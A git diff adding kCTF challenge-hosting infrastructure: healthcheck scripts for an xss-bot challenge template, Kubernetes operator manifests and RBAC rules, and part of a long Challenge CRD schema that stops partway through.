+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+FROM gcr.io/kctf-docker/healthcheck@sha256:6709709a8cfd6e2d743c86d58398c00ca4eb26befd3b1a0a629ab35f91e98ef0
+
+COPY healthcheck_loop.sh healthcheck.py healthz_webserver.py /home/user/
+
+CMD kctf_drop_privs /home/user/healthcheck_loop.sh & /home/user/healthz_webserver.py
diff --git a/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/README.md b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/README.md
new file mode 100644
index 00000000..8dbcd6a8
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/README.md
@@ -0,0 +1,23 @@
+# Healthcheck
+
+kCTF checks the health of challenges by accessing the healthcheck via
+http://host:45281/healthz, which needs to return either 200 OK or an error
+status depending on the health of the challenge.
+
+The default healthcheck consists of:
+* a loop that repeatedly calls a python script and writes the status to a file
+* a webserver that checks the file and serves /healthz
+* the actual healthcheck code, using pwntools for convenience
+
+To modify it, you will likely only have to change the script in healthcheck.py.
+You can test whether the challenge replies as expected or, better, add a full
+example solution that tries to get the flag from the challenge.
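+
+To poke at the webserver part by hand, query the healthz endpoint once port
+45281 is reachable locally (a small sketch; `kctf chal debug port-forward` is
+one way to get there):
+
+```bash
+# prints the status body plus the HTTP code (200 = healthy, 400 = unhealthy)
+curl -sw ' %{http_code}\n' http://localhost:45281/healthz
+```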
diff --git a/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthcheck.py b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthcheck.py
new file mode 100755
index 00000000..62b34457
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthcheck.py
@@ -0,0 +1,20 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+import socket
+from pwn import *
+
+# Connect to the bot and open a local listener for the bot's browser to visit.
+r = remote('127.0.0.1', 1337)
+l = listen()
+
+# Hand the bot a URL that points back at our listener.
+r.readuntil(b'URL to open.', timeout=10)
+r.send(bytes('http://localhost:{}/ok'.format(l.lport), 'ascii'))
+
+# The check passes once the browser actually fetches the page.
+_ = l.wait_for_connection()
+l.readuntil(b'GET /ok HTTP/1.1')
+l.send(b'HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n')
+
+exit(0)
diff --git a/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthcheck_loop.sh b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthcheck_loop.sh
new file mode 100755
index 00000000..acf69158
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthcheck_loop.sh
@@ -0,0 +1,32 @@
+#!/bin/bash
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+set -Eeuo pipefail
+
+TIMEOUT=20
+PERIOD=30
+
+export TERM=linux
+export TERMINFO=/etc/terminfo
+
+while true; do
+  echo -n "[$(date)] "
+  if timeout "${TIMEOUT}" /home/user/healthcheck.py; then
+    echo 'ok' | tee /tmp/healthz
+  else
+    echo -n "$? "
+    echo 'err' | tee /tmp/healthz
+  fi
+  sleep "${PERIOD}"
+done
diff --git a/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthz_webserver.py b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthz_webserver.py
new file mode 100755
index 00000000..62cf0198
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/healthz_webserver.py
@@ -0,0 +1,39 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+import http.server + +class HealthzHandler(http.server.BaseHTTPRequestHandler): + def do_GET(self): + if self.path != '/healthz': + self.send_response(404) + self.send_header("Content-length", "0") + self.end_headers() + return + + content = b'err' + try: + with open('/tmp/healthz', 'rb') as fd: + content = fd.read().strip() + except: + pass + self.send_response(200 if content == b'ok' else 400) + self.send_header("Content-type", "text/plain") + self.send_header("Content-length", str(len(content))) + self.end_headers() + self.wfile.write(content) + +httpd = http.server.HTTPServer(('', 45281), HealthzHandler) +httpd.serve_forever() diff --git a/v8ctf/kctf/resources/kctf-operator-controller-manager-metrics-service_v1_service.yaml b/v8ctf/kctf/resources/kctf-operator-controller-manager-metrics-service_v1_service.yaml new file mode 100644 index 00000000..c226cb87 --- /dev/null +++ b/v8ctf/kctf/resources/kctf-operator-controller-manager-metrics-service_v1_service.yaml @@ -0,0 +1,17 @@ +apiVersion: v1 +kind: Service +metadata: + creationTimestamp: null + labels: + control-plane: controller-manager + name: kctf-operator-controller-manager-metrics-service +spec: + ports: + - name: https + port: 8443 + protocol: TCP + targetPort: https + selector: + control-plane: controller-manager +status: + loadBalancer: {} diff --git a/v8ctf/kctf/resources/kctf-operator-manager-config_v1_configmap.yaml b/v8ctf/kctf/resources/kctf-operator-manager-config_v1_configmap.yaml new file mode 100644 index 00000000..121d2791 --- /dev/null +++ b/v8ctf/kctf/resources/kctf-operator-manager-config_v1_configmap.yaml @@ -0,0 +1,17 @@ +apiVersion: v1 +data: + controller_manager_config.yaml: | + apiVersion: controller-runtime.sigs.k8s.io/v1alpha1 + kind: ControllerManagerConfig + health: + healthProbeBindAddress: :8081 + metrics: + bindAddress: 127.0.0.1:8080 + webhook: + port: 9443 + leaderElection: + leaderElect: true + resourceName: 558d99b6.dev +kind: ConfigMap +metadata: + name: kctf-operator-manager-config diff --git a/v8ctf/kctf/resources/kctf-operator-metrics-reader_rbac.authorization.k8s.io_v1_clusterrole.yaml b/v8ctf/kctf/resources/kctf-operator-metrics-reader_rbac.authorization.k8s.io_v1_clusterrole.yaml new file mode 100644 index 00000000..8701a21e --- /dev/null +++ b/v8ctf/kctf/resources/kctf-operator-metrics-reader_rbac.authorization.k8s.io_v1_clusterrole.yaml @@ -0,0 +1,10 @@ +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + creationTimestamp: null + name: kctf-operator-metrics-reader +rules: +- nonResourceURLs: + - /metrics + verbs: + - get diff --git a/v8ctf/kctf/resources/kctf-operator.clusterserviceversion.yaml b/v8ctf/kctf/resources/kctf-operator.clusterserviceversion.yaml new file mode 100644 index 00000000..4e1fe52c --- /dev/null +++ b/v8ctf/kctf/resources/kctf-operator.clusterserviceversion.yaml @@ -0,0 +1,415 @@ +apiVersion: operators.coreos.com/v1alpha1 +kind: ClusterServiceVersion +metadata: + annotations: + alm-examples: |- + [ + { + "apiVersion": "kctf.dev/v1", + "kind": "Challenge", + "metadata": { + "name": "challenge-sample" + }, + "spec": null + } + ] + capabilities: Basic Install + operators.operatorframework.io/builder: operator-sdk-v1.17.0+git + operators.operatorframework.io/project_layout: go.kubebuilder.io/v3 + name: kctf-operator.v0.0.1 + namespace: placeholder +spec: + apiservicedefinitions: {} + customresourcedefinitions: + owned: + - description: Challenge is the Schema for the challenges API + displayName: Challenge + kind: Challenge + name: challenges.kctf.dev 
+ version: v1 + description: Operator for KCTF + displayName: kctf-operator + icon: + - base64data: "" + mediatype: "" + install: + spec: + clusterPermissions: + - rules: + - apiGroups: + - apps + resources: + - daemonsets + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - apps + resources: + - deployments + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - autoscaling + resources: + - horizontalpodautoscalers + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - cloud.google.com + resources: + - backendconfigs + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - configmaps + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - endpoints + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - nodes + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - persistentvolumeclaims + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - persistentvolumes + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - pods + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - secrets + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - "" + resources: + - services + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - extensions + resources: + - ingresses + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - kctf.dev + resources: + - challenges + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - kctf.dev + resources: + - challenges/finalizers + verbs: + - update + - apiGroups: + - kctf.dev + resources: + - challenges/status + verbs: + - get + - patch + - update + - apiGroups: + - networking.gke.io + resources: + - managedcertificates + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - networking.k8s.io + resources: + - ingresses + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - networking.k8s.io + resources: + - networkpolicies + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - rbac.authorization.k8s.io + resources: + - clusterrolebindings + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - rbac.authorization.k8s.io + resources: + - clusterroles + verbs: + - create + - delete + - get + - list + - patch + - update + - watch + - apiGroups: + - authentication.k8s.io + resources: + - tokenreviews + verbs: + - create + - apiGroups: + - authorization.k8s.io + resources: + - subjectaccessreviews + verbs: + - create + serviceAccountName: kctf-operator-controller-manager + deployments: + - name: kctf-operator-controller-manager + spec: + replicas: 1 + selector: + matchLabels: + control-plane: controller-manager + strategy: {} + template: + metadata: + labels: + control-plane: controller-manager + spec: + containers: + - args: + - --secure-listen-address=0.0.0.0:8443 + - 
--upstream=http://127.0.0.1:8080/ + - --logtostderr=true + - --v=10 + image: gcr.io/kubebuilder/kube-rbac-proxy:v0.8.0 + name: kube-rbac-proxy + ports: + - containerPort: 8443 + name: https + protocol: TCP + resources: {} + - args: + - --health-probe-bind-address=:8081 + - --metrics-bind-address=127.0.0.1:8080 + - --leader-elect + command: + - /manager + env: + - name: ALLOWED_IPS + value: 0.0.0.0/0 + - name: SECURITY_POLICY + value: kctf-policy + + image: eu.gcr.io/kctf-testing/kctf-operator:dev + livenessProbe: + httpGet: + path: /healthz + port: 8081 + initialDelaySeconds: 15 + periodSeconds: 20 + name: manager + readinessProbe: + httpGet: + path: /readyz + port: 8081 + initialDelaySeconds: 5 + periodSeconds: 10 + resources: + limits: + cpu: 200m + memory: 100Mi + requests: + cpu: 100m + memory: 20Mi + securityContext: + allowPrivilegeEscalation: false + securityContext: + runAsNonRoot: true + serviceAccountName: kctf-operator-controller-manager + terminationGracePeriodSeconds: 10 + permissions: + - rules: + - apiGroups: + - "" + resources: + - configmaps + verbs: + - get + - list + - watch + - create + - update + - patch + - delete + - apiGroups: + - coordination.k8s.io + resources: + - leases + verbs: + - get + - list + - watch + - create + - update + - patch + - delete + - apiGroups: + - "" + resources: + - events + verbs: + - create + - patch + serviceAccountName: kctf-operator-controller-manager + strategy: deployment + installModes: + - supported: false + type: OwnNamespace + - supported: false + type: SingleNamespace + - supported: false + type: MultiNamespace + - supported: true + type: AllNamespaces + keywords: + - kctf + links: + - name: Kctf Operator + url: https://kctf-operator.domain + maintainers: + - email: kctf@google.com + name: kctf + maturity: alpha + provider: + name: Google + url: http://kctf.dev + version: 0.0.1 diff --git a/v8ctf/kctf/resources/kctf.dev_challenges.yaml b/v8ctf/kctf/resources/kctf.dev_challenges.yaml new file mode 100644 index 00000000..dfeb42c5 --- /dev/null +++ b/v8ctf/kctf/resources/kctf.dev_challenges.yaml @@ -0,0 +1,7357 @@ +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + annotations: + controller-gen.kubebuilder.io/version: v0.7.0 + creationTimestamp: null + name: challenges.kctf.dev +spec: + group: kctf.dev + names: + kind: Challenge + listKind: ChallengeList + plural: challenges + singular: challenge + scope: Namespaced + versions: + - additionalPrinterColumns: + - jsonPath: .status.health + name: Health + type: string + - jsonPath: .status.status + name: Status + type: string + - jsonPath: .spec.deployed + name: Deployed + type: boolean + - jsonPath: .spec.network.public + name: Public + type: boolean + name: v1 + schema: + openAPIV3Schema: + description: Challenge is the Schema for the challenges API + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this representation + of an object. Servers should convert recognized schemas to the latest + internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource this + object represents. Servers may infer this from the endpoint the client + submits requests to. Cannot be updated. In CamelCase. 
More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + type: object + spec: + description: ChallengeSpec defines the desired state of Challenge + properties: + allowConnectTo: + items: + type: string + type: array + deployed: + default: false + description: Shows if the challenge is ready to be deployed, if not, + it sets the replicas to 0 and disables services/ingress + type: boolean + healthcheck: + description: Healthcheck checks if the challenge works If empty, healthcheck + is not enabled by default + properties: + enabled: + default: false + type: boolean + image: + default: healthcheck + description: Image for the healthcheck container + type: string + type: object + horizontalPodAutoscalerSpec: + description: Autoscaling features determine quantity of replicas and + CPU utilization If empty, autoscaling is not enabled by default + properties: + maxReplicas: + description: upper limit for the number of pods that can be set + by the autoscaler; cannot be smaller than MinReplicas. + format: int32 + type: integer + minReplicas: + description: minReplicas is the lower limit for the number of + replicas to which the autoscaler can scale down. It defaults + to 1 pod. minReplicas is allowed to be 0 if the alpha feature + gate HPAScaleToZero is enabled and at least one Object or External + metric is configured. Scaling is active as long as at least + one metric value is available. + format: int32 + type: integer + targetCPUUtilizationPercentage: + description: target average CPU utilization (represented as a + percentage of requested CPU) over all the pods; if not specified + the default autoscaling policy will be used. + format: int32 + type: integer + required: + - maxReplicas + type: object + image: + default: challenge + description: Image used by the deployment + type: string + network: + description: 'The network specifications: if it''s public or not and + specifications about ports' + properties: + ports: + description: By default, one port is set with default values + items: + properties: + domains: + description: Extra domains for managed certificates. Only + used for type HTTPS. + items: + type: string + type: array + name: + description: Name of the port + type: string + port: + description: Port + format: int32 + type: integer + protocol: + default: TCP + description: Protocol is not optional + type: string + targetPort: + anyOf: + - type: integer + - type: string + description: TargetPort is not optional + x-kubernetes-int-or-string: true + required: + - protocol + - targetPort + type: object + type: array + public: + default: false + type: boolean + type: object + persistentVolumeClaims: + description: Names of the desired PersistentVolumeClaims + items: + type: string + type: array + podTemplate: + description: PodTemplate is used to set the template for the deployment's + pod, so that an author can add volumeMounts and other extra features + properties: + apiVersion: + description: 'APIVersion defines the versioned schema of this + representation of an object. Servers should convert recognized + schemas to the latest internal value, and may reject unrecognized + values. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#resources' + type: string + kind: + description: 'Kind is a string value representing the REST resource + this object represents. Servers may infer this from the endpoint + the client submits requests to. Cannot be updated. 
In CamelCase. + More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#types-kinds' + type: string + metadata: + description: 'Standard object''s metadata. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata' + type: object + template: + description: Template defines the pods that will be created from + this pod template. https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status + properties: + metadata: + description: 'Standard object''s metadata. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata' + type: object + spec: + description: 'Specification of the desired behavior of the + pod. More info: https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#spec-and-status' + properties: + activeDeadlineSeconds: + description: Optional duration in seconds the pod may + be active on the node relative to StartTime before the + system will actively try to mark it failed and kill + associated containers. Value must be a positive integer. + format: int64 + type: integer + affinity: + description: If specified, the pod's scheduling constraints + properties: + nodeAffinity: + description: Describes node affinity scheduling rules + for the pod. + properties: + preferredDuringSchedulingIgnoredDuringExecution: + description: The scheduler will prefer to schedule + pods to nodes that satisfy the affinity expressions + specified by this field, but it may choose a + node that violates one or more of the expressions. + The node that is most preferred is the one with + the greatest sum of weights, i.e. for each node + that meets all of the scheduling requirements + (resource request, requiredDuringScheduling + affinity expressions, etc.), compute a sum by + iterating through the elements of this field + and adding "weight" to the sum if the node matches + the corresponding matchExpressions; the node(s) + with the highest sum are the most preferred. + items: + description: An empty preferred scheduling term + matches all objects with implicit weight 0 + (i.e. it's a no-op). A null preferred scheduling + term matches no objects (i.e. is also a no-op). + properties: + preference: + description: A node selector term, associated + with the corresponding weight. + properties: + matchExpressions: + description: A list of node selector + requirements by node's labels. + items: + description: A node selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: The label key that + the selector applies to. + type: string + operator: + description: Represents a key's + relationship to a set of values. + Valid operators are In, NotIn, + Exists, DoesNotExist. Gt, and + Lt. + type: string + values: + description: An array of string + values. If the operator is In + or NotIn, the values array must + be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + If the operator is Gt or Lt, + the values array must have a + single element, which will be + interpreted as an integer. This + array is replaced during a strategic + merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchFields: + description: A list of node selector + requirements by node's fields. 
+ items: + description: A node selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: The label key that + the selector applies to. + type: string + operator: + description: Represents a key's + relationship to a set of values. + Valid operators are In, NotIn, + Exists, DoesNotExist. Gt, and + Lt. + type: string + values: + description: An array of string + values. If the operator is In + or NotIn, the values array must + be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + If the operator is Gt or Lt, + the values array must have a + single element, which will be + interpreted as an integer. This + array is replaced during a strategic + merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + type: object + weight: + description: Weight associated with matching + the corresponding nodeSelectorTerm, in + the range 1-100. + format: int32 + type: integer + required: + - preference + - weight + type: object + type: array + requiredDuringSchedulingIgnoredDuringExecution: + description: If the affinity requirements specified + by this field are not met at scheduling time, + the pod will not be scheduled onto the node. + If the affinity requirements specified by this + field cease to be met at some point during pod + execution (e.g. due to an update), the system + may or may not try to eventually evict the pod + from its node. + properties: + nodeSelectorTerms: + description: Required. A list of node selector + terms. The terms are ORed. + items: + description: A null or empty node selector + term matches no objects. The requirements + of them are ANDed. The TopologySelectorTerm + type implements a subset of the NodeSelectorTerm. + properties: + matchExpressions: + description: A list of node selector + requirements by node's labels. + items: + description: A node selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: The label key that + the selector applies to. + type: string + operator: + description: Represents a key's + relationship to a set of values. + Valid operators are In, NotIn, + Exists, DoesNotExist. Gt, and + Lt. + type: string + values: + description: An array of string + values. If the operator is In + or NotIn, the values array must + be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + If the operator is Gt or Lt, + the values array must have a + single element, which will be + interpreted as an integer. This + array is replaced during a strategic + merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchFields: + description: A list of node selector + requirements by node's fields. + items: + description: A node selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: The label key that + the selector applies to. + type: string + operator: + description: Represents a key's + relationship to a set of values. + Valid operators are In, NotIn, + Exists, DoesNotExist. Gt, and + Lt. + type: string + values: + description: An array of string + values. If the operator is In + or NotIn, the values array must + be non-empty. 
If the operator + is Exists or DoesNotExist, the + values array must be empty. + If the operator is Gt or Lt, + the values array must have a + single element, which will be + interpreted as an integer. This + array is replaced during a strategic + merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + type: object + type: array + required: + - nodeSelectorTerms + type: object + type: object + podAffinity: + description: Describes pod affinity scheduling rules + (e.g. co-locate this pod in the same node, zone, + etc. as some other pod(s)). + properties: + preferredDuringSchedulingIgnoredDuringExecution: + description: The scheduler will prefer to schedule + pods to nodes that satisfy the affinity expressions + specified by this field, but it may choose a + node that violates one or more of the expressions. + The node that is most preferred is the one with + the greatest sum of weights, i.e. for each node + that meets all of the scheduling requirements + (resource request, requiredDuringScheduling + affinity expressions, etc.), compute a sum by + iterating through the elements of this field + and adding "weight" to the sum if the node has + pods which matches the corresponding podAffinityTerm; + the node(s) with the highest sum are the most + preferred. + items: + description: The weights of all of the matched + WeightedPodAffinityTerm fields are added per-node + to find the most preferred node(s) + properties: + podAffinityTerm: + description: Required. A pod affinity term, + associated with the corresponding weight. + properties: + labelSelector: + description: A label query over a set + of resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is + a list of label selector requirements. + The requirements are ANDed. + items: + description: A label selector + requirement is a selector that + contains values, a key, and + an operator that relates the + key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to + a set of values. Valid operators + are In, NotIn, Exists and + DoesNotExist. + type: string + values: + description: values is an + array of string values. + If the operator is In or + NotIn, the values array + must be non-empty. If the + operator is Exists or DoesNotExist, + the values array must be + empty. This array is replaced + during a strategic merge + patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map + of {key,value} pairs. A single + {key,value} in the matchLabels + map is equivalent to an element + of matchExpressions, whose key + field is "key", the operator is + "In", and the values array contains + only "value". The requirements + are ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the + set of namespaces that the term applies + to. The term is applied to the union + of the namespaces selected by this + field and the ones listed in the namespaces + field. null selector and null or empty + namespaces list means "this pod's + namespace". An empty selector ({}) + matches all namespaces. This field + is beta-level and is only honored + when PodAffinityNamespaceSelector + feature is enabled. 
+ properties: + matchExpressions: + description: matchExpressions is + a list of label selector requirements. + The requirements are ANDed. + items: + description: A label selector + requirement is a selector that + contains values, a key, and + an operator that relates the + key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to + a set of values. Valid operators + are In, NotIn, Exists and + DoesNotExist. + type: string + values: + description: values is an + array of string values. + If the operator is In or + NotIn, the values array + must be non-empty. If the + operator is Exists or DoesNotExist, + the values array must be + empty. This array is replaced + during a strategic merge + patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map + of {key,value} pairs. A single + {key,value} in the matchLabels + map is equivalent to an element + of matchExpressions, whose key + field is "key", the operator is + "In", and the values array contains + only "value". The requirements + are ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a + static list of namespace names that + the term applies to. The term is applied + to the union of the namespaces listed + in this field and the ones selected + by namespaceSelector. null or empty + namespaces list and null namespaceSelector + means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located + (affinity) or not co-located (anti-affinity) + with the pods matching the labelSelector + in the specified namespaces, where + co-located is defined as running on + a node whose value of the label with + key topologyKey matches that of any + node on which any of the selected + pods is running. Empty topologyKey + is not allowed. + type: string + required: + - topologyKey + type: object + weight: + description: weight associated with matching + the corresponding podAffinityTerm, in + the range 1-100. + format: int32 + type: integer + required: + - podAffinityTerm + - weight + type: object + type: array + requiredDuringSchedulingIgnoredDuringExecution: + description: If the affinity requirements specified + by this field are not met at scheduling time, + the pod will not be scheduled onto the node. + If the affinity requirements specified by this + field cease to be met at some point during pod + execution (e.g. due to a pod label update), + the system may or may not try to eventually + evict the pod from its node. When there are + multiple elements, the lists of nodes corresponding + to each podAffinityTerm are intersected, i.e. + all terms must be satisfied. + items: + description: Defines a set of pods (namely those + matching the labelSelector relative to the + given namespace(s)) that this pod should be + co-located (affinity) or not co-located (anti-affinity) + with, where co-located is defined as running + on a node whose value of the label with key + matches that of any node on + which a pod of the set of pods is running + properties: + labelSelector: + description: A label query over a set of + resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is a list + of label selector requirements. The + requirements are ANDed. 
+ items: + description: A label selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to a set + of values. Valid operators are + In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array + of string values. If the operator + is In or NotIn, the values array + must be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + This array is replaced during + a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of + {key,value} pairs. A single {key,value} + in the matchLabels map is equivalent + to an element of matchExpressions, + whose key field is "key", the operator + is "In", and the values array contains + only "value". The requirements are + ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the set + of namespaces that the term applies to. + The term is applied to the union of the + namespaces selected by this field and + the ones listed in the namespaces field. + null selector and null or empty namespaces + list means "this pod's namespace". An + empty selector ({}) matches all namespaces. + This field is beta-level and is only honored + when PodAffinityNamespaceSelector feature + is enabled. + properties: + matchExpressions: + description: matchExpressions is a list + of label selector requirements. The + requirements are ANDed. + items: + description: A label selector requirement + is a selector that contains values, + a key, and an operator that relates + the key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to a set + of values. Valid operators are + In, NotIn, Exists and DoesNotExist. + type: string + values: + description: values is an array + of string values. If the operator + is In or NotIn, the values array + must be non-empty. If the operator + is Exists or DoesNotExist, the + values array must be empty. + This array is replaced during + a strategic merge patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map of + {key,value} pairs. A single {key,value} + in the matchLabels map is equivalent + to an element of matchExpressions, + whose key field is "key", the operator + is "In", and the values array contains + only "value". The requirements are + ANDed. + type: object + type: object + namespaces: + description: namespaces specifies a static + list of namespace names that the term + applies to. The term is applied to the + union of the namespaces listed in this + field and the ones selected by namespaceSelector. 
+ null or empty namespaces list and null + namespaceSelector means "this pod's namespace" + items: + type: string + type: array + topologyKey: + description: This pod should be co-located + (affinity) or not co-located (anti-affinity) + with the pods matching the labelSelector + in the specified namespaces, where co-located + is defined as running on a node whose + value of the label with key topologyKey + matches that of any node on which any + of the selected pods is running. Empty + topologyKey is not allowed. + type: string + required: + - topologyKey + type: object + type: array + type: object + podAntiAffinity: + description: Describes pod anti-affinity scheduling + rules (e.g. avoid putting this pod in the same node, + zone, etc. as some other pod(s)). + properties: + preferredDuringSchedulingIgnoredDuringExecution: + description: The scheduler will prefer to schedule + pods to nodes that satisfy the anti-affinity + expressions specified by this field, but it + may choose a node that violates one or more + of the expressions. The node that is most preferred + is the one with the greatest sum of weights, + i.e. for each node that meets all of the scheduling + requirements (resource request, requiredDuringScheduling + anti-affinity expressions, etc.), compute a + sum by iterating through the elements of this + field and adding "weight" to the sum if the + node has pods which matches the corresponding + podAffinityTerm; the node(s) with the highest + sum are the most preferred. + items: + description: The weights of all of the matched + WeightedPodAffinityTerm fields are added per-node + to find the most preferred node(s) + properties: + podAffinityTerm: + description: Required. A pod affinity term, + associated with the corresponding weight. + properties: + labelSelector: + description: A label query over a set + of resources, in this case pods. + properties: + matchExpressions: + description: matchExpressions is + a list of label selector requirements. + The requirements are ANDed. + items: + description: A label selector + requirement is a selector that + contains values, a key, and + an operator that relates the + key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to + a set of values. Valid operators + are In, NotIn, Exists and + DoesNotExist. + type: string + values: + description: values is an + array of string values. + If the operator is In or + NotIn, the values array + must be non-empty. If the + operator is Exists or DoesNotExist, + the values array must be + empty. This array is replaced + during a strategic merge + patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map + of {key,value} pairs. A single + {key,value} in the matchLabels + map is equivalent to an element + of matchExpressions, whose key + field is "key", the operator is + "In", and the values array contains + only "value". The requirements + are ANDed. + type: object + type: object + namespaceSelector: + description: A label query over the + set of namespaces that the term applies + to. The term is applied to the union + of the namespaces selected by this + field and the ones listed in the namespaces + field. null selector and null or empty + namespaces list means "this pod's + namespace". 
An empty selector ({}) + matches all namespaces. This field + is beta-level and is only honored + when PodAffinityNamespaceSelector + feature is enabled. + properties: + matchExpressions: + description: matchExpressions is + a list of label selector requirements. + The requirements are ANDed. + items: + description: A label selector + requirement is a selector that + contains values, a key, and + an operator that relates the + key and values. + properties: + key: + description: key is the label + key that the selector applies + to. + type: string + operator: + description: operator represents + a key's relationship to + a set of values. Valid operators + are In, NotIn, Exists and + DoesNotExist. + type: string + values: + description: values is an + array of string values. + If the operator is In or + NotIn, the values array + must be non-empty. If the + operator is Exists or DoesNotExist, + the values array must be + empty. This array is replaced + during a strategic merge + patch. + items: + type: string + type: array + required: + - key + - operator + type: object + type: array + matchLabels: + additionalProperties: + type: string + description: matchLabels is a map + of {key,value} pairs. A single + {key,value} in the matchLabels + map is equivalent to an element + of matchExpressions, whose key + field is "key", the operator is + "In", and the values array contains + only "value". The requirements + are ANDed. + type: object + type: object + 